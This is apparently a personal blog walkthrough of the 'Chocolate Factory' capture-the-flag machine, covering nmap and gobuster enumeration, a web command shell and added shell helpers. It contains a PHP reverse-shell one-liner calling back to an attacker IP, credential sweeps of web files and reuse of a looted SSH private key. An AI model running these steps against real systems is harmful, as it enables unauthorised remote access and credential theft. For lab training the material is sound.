Chocolate Factory

Rithvik Reddy
Feb 26, 2022


Is it responding to ping requests?

Yes, the host is up.

Let's go with the traditional method:

Enumeration

nmap -p- -A -T4 10.10.143.180
  • -p- scans all 65535 TCP ports instead of nmap's default top 1000.
  • -A enables OS detection, version detection, the default NSE scripts and traceroute.
  • -T4 selects the aggressive timing template: faster, but noisier.
  • -v or -vv turns on verbose mode, so results print as they come in instead of only at the end.

After a long wait (a full -p- -A scan is slow; scanning all ports first and rerunning -A only against the open ones is quicker), this returned a lot of information, including a few hints that turned out to be of no use.

Now let's go through the findings one by one.

A web server is running.

I tried SQL injection and authentication bypass, but nothing came up.

Next, brute-force directories and files with gobuster.

This turned up home.php.

home.php provides a web command shell, while validate.php asks for credentials, so I used the command shell to get a reverse shell back to my machine: netcat listens on the attacking side and a PHP one-liner on the target connects back to it.

Start a netcat listener on your machine (the payload below connects back to 10.8.151.122:4444, so change the address and port to match yours), then run this command through the web command shell:

php -r '$sock=fsockopen("10.8.151.122",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

Yooo, we got a shell, running as www-data.

One caveat on the payload: the <&3 >&3 2>&3 redirections assume the socket fsockopen opened is file descriptor 3, the first free descriptor after stdin, stdout and stderr. If the PHP process already has other files open the number differs and the shell never attaches, so if nothing connects back, a proc_open-based variant that hands the socket to /bin/sh explicitly is the more robust choice.

Now upgrade to a proper TTY, because commands such as su refuse to run without a terminal:

script -qc /bin/bash /dev/null

Here key_rev_key looks interesting; let's look at its printable contents with strings.

That reveals the key. Next, go through every file in the directory in case something else was left behind.

And yes: validate.php contains hard-coded credentials.
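The two checks just described, a strings-style pass over a binary and a grep sweep for hard-coded credentials in the PHP sources, as an added shell example that is not part of the original writeup. The directory, the file contents and the planted key are constructed stand-ins built by make_webroot, not the real files from the box.

```shell
# Added example (not from the original writeup): loot a directory the way the
# writeup does, first with a strings-style pass over a binary, then with a grep
# sweep for hard-coded credentials. All sample files are constructed below.

# strings_min FILE [MINLEN]
# Print every run of at least MINLEN (default 4) printable ASCII characters,
# roughly what `strings -n MINLEN FILE` prints for ASCII data.
strings_min() {
    tr -c '[:print:]' '\n' < "$1" | grep -E "^.{${2:-4},}$"
}

# find_key FILE
# Keep only the printable runs that look like an embedded secret: a
# label=value / label:value pair, or a long bare alphanumeric token.
find_key() {
    strings_min "$1" 8 | grep -E '^[[:alnum:]_]+[=:].+|^[[:alnum:]]{16,}$'
}

# grep_creds DIR
# Sweep source and config files for assignments or comparisons of a variable
# whose name mentions user, pass, secret, token or key against a quoted literal.
grep_creds() {
    pat="(user|pass|secret|token|key)[a-z_]*[[:space:]]*(={1,3}|=>|:)[[:space:]]*[\"'][^\"']+"
    find "$1" -type f \( -name '*.php' -o -name '*.conf' -o -name '*.txt' -o -name '*.env' \) \
        -exec grep -n -E -i "$pat" /dev/null {} +
}

# make_webroot DIR
# Build a constructed stand-in for the web root: an ELF-like blob with a
# planted key and a validate.php with made-up credentials. Nothing here is
# taken from the real machine.
make_webroot() {
    mkdir -p "$1"
    {
        printf '\177ELF\001\001\001\000\000\000'
        printf 'Enter the key: \000\000\001\002'
        printf 'KEY=%s\000\003\004Wrong key\000\000' 'example_key_not_real'
    } > "$1/key_rev_key"
    printf '<?php\n$uname = $_POST["uname"];\n$password = $_POST["password"];\nif ($uname == "example_user" && $password == "example_pass") {\n    setcookie("loggedin", "1");\n}\n' > "$1/validate.php"
    printf '<html><body>nothing to see here</body></html>\n' > "$1/index.php"
}

# Usage on a real box: strings_min ./key_rev_key, find_key ./key_rev_key,
# then grep_creds /var/www/html (path is a placeholder).
```

find_key is deliberately narrow so that prompt text such as "Enter the key:" does not drown out the value; loosen the pattern if the target uses a different label style. grep_creds also catches comparisons (==) rather than only assignments, because login checks like the one in validate.php compare the submitted password against the literal.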

These are charlie's credentials, so switch user to charlie. user.txt is there, but we don't have permission to read it.

Now what? Let's check all the files for any useful information.

We got both public and private SSH keys.

Save the private key into a file on your machine, make it readable only by you (ssh refuses a key file that other users can read), and log in with ssh -i and that key.
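Saving the key and checking it before use, as an added shell example that is not part of the original writeup. install_key cleans a pasted key (carriage returns, stray text around the BEGIN/END markers) and sets the mode ssh demands; key_needs_passphrase tells you up front whether the key is encrypted and will prompt for a passphrase. The key texts in the test are constructed and are not real keys; the user, host and paths in the usage comment are placeholders.

```shell
# Added example (not from the original writeup): save a private key pasted
# from the target and check it before using it with `ssh -i`.

# install_key SRC DEST
# Copy the key block out of SRC into DEST, dropping carriage returns and any
# text outside the BEGIN/END markers, and set mode 600: ssh refuses a key file
# that other users can read ("UNPROTECTED PRIVATE KEY FILE!").
install_key() {
    src=$1; dest=$2
    tr -d '\r' < "$src" |
        sed -n '/-----BEGIN .*PRIVATE KEY-----/,/-----END .*PRIVATE KEY-----/p' > "$dest"
    grep -q -e '-----BEGIN .*PRIVATE KEY-----' "$dest" ||
        { echo "install_key: no private key header in $src" >&2; return 1; }
    grep -q -e '-----END .*PRIVATE KEY-----' "$dest" ||
        { echo "install_key: END marker missing, truncated paste?" >&2; return 1; }
    chmod 600 "$dest"
}

# key_needs_passphrase FILE  -> exit status 0 if the key is encrypted
key_needs_passphrase() {
    if grep -q 'BEGIN OPENSSH PRIVATE KEY' "$1"; then
        # openssh-key-v1 format: the cipher and KDF names are the first fields
        # of the base64 body; an encrypted key uses the "bcrypt" KDF, an
        # unencrypted one has KDF "none".
        sed '1d;$d' "$1" | base64 -d 2>/dev/null | tr -c '[:print:]' '\n' | grep -q '^bcrypt$'
    else
        # Classic PEM (RSA/EC) and PKCS#8 mark encryption in the header.
        grep -q -E 'Proc-Type: 4,ENCRYPTED|BEGIN ENCRYPTED PRIVATE KEY' "$1"
    fi
}

# Typical use (placeholder user, host and paths):
#   install_key pasted.txt ~/.ssh/charlie_key &&
#       ssh -i ~/.ssh/charlie_key charlie@10.10.143.180
```

If key_needs_passphrase succeeds, ssh will prompt for the passphrase on login; if you don't have it, that is the point at which an offline guess against the key file becomes the next step rather than more enumeration.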

BOOM.

Let's escalate further and play GOD on this machine.

This is the greatest rush: GOD access.

The feeling never gets old.

Thanks for Scrolling Down.

Rithvik Reddy.
